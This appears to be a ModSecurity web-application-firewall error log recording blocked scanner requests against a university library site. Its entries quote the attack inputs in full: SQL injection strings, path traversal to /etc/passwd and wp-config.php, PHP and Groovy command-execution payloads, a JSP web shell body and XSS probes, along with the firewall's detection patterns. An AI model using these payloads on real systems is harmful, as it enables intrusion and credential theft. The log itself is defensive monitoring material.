[Tue Aug 29 11:47:37.368426 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14acCo-f0AAAkNPlUAAAAI"]
[Tue Aug 29 11:47:37.497060 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjM7FgAAAAT"]
[Tue Aug 29 11:47:39.413104 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAhzvs8AAAAx"]
[Tue Aug 29 11:47:40.372779 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAkGCSwAAAAE"]
[Tue Aug 29 11:47:40.383088 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAkGCSwAAAAE"]
[Tue Aug 29 11:47:41.426337 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAj117QAAAAa"]
[Tue Aug 29 11:47:41.434797 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAj117QAAAAa"]
[Tue Aug 29 11:47:42.380959 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAjZRcUAAAAS"]
[Tue Aug 29 11:47:42.403894 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAj117wAAAAa"]
[Tue Aug 29 11:47:43.620574 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAjav4QAAAAV"]
[Tue Aug 29 11:47:44.365065 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAhl0LcAAAAi"]
[Tue Aug 29 11:47:44.396040 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAkAL8UAAAAU"]
[Tue Aug 29 11:47:45.592518 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAjtc4IAAAAX"]
[Tue Aug 29 11:47:47.293233 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAjM7GwAAAAT"]
[Tue Aug 29 11:47:48.392200 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAkcgS8AAAAM"]
[Tue Aug 29 11:47:48.465438 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAjrbJ4AAAAP"]
[Tue Aug 29 11:47:49.493543 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkaC@gAAAAJ"]
[Tue Aug 29 11:47:49.497427 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAkAL8sAAAAU"]
[Tue Aug 29 11:47:50.394889 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkBKosAAAAb"]
[Tue Aug 29 11:47:50.435404 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkaC@4AAAAJ"]
[Tue Aug 29 11:47:50.449903 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14dsCo-f0AAAjbw3EAAAAW"]
[Tue Aug 29 11:47:50.454598 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAhT4DEAAAAD"]
[Tue Aug 29 11:47:51.460703 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAjM7HQAAAAT"]
[Tue Aug 29 11:47:51.461586 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "perpustakaan.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAkdu4QAAAAO"]
[Tue Aug 29 11:47:52.583656 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjM7HcAAAAT"]
[Tue Aug 29 11:47:53.352388 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjbw3kAAAAW"]
[Tue Aug 29 11:47:54.417748 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14esCo-f0AAAkaC-MAAAAJ"]
[Tue Aug 29 11:47:56.420942 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAjav5cAAAAV"]
[Tue Aug 29 11:47:57.387497 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAjCbM0AAAAB"]
[Tue Aug 29 11:47:58.406843 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAkGCVMAAAAE"]
[Tue Aug 29 11:47:58.461699 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAi2yMQAAAAN"]
[Tue Aug 29 11:48:00.632557 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14gMCo-f0AAAjy53IAAAAG"]
[Tue Aug 29 11:48:03.383696 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAkNPsEAAAAI"]
[Tue Aug 29 11:48:03.387010 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14g8Co-f0AAAjy54wAAAAG"]
[Tue Aug 29 11:48:04.469996 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAj12BcAAAAa"]
[Tue Aug 29 11:48:05.360251 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAjbw64AAAAW"]
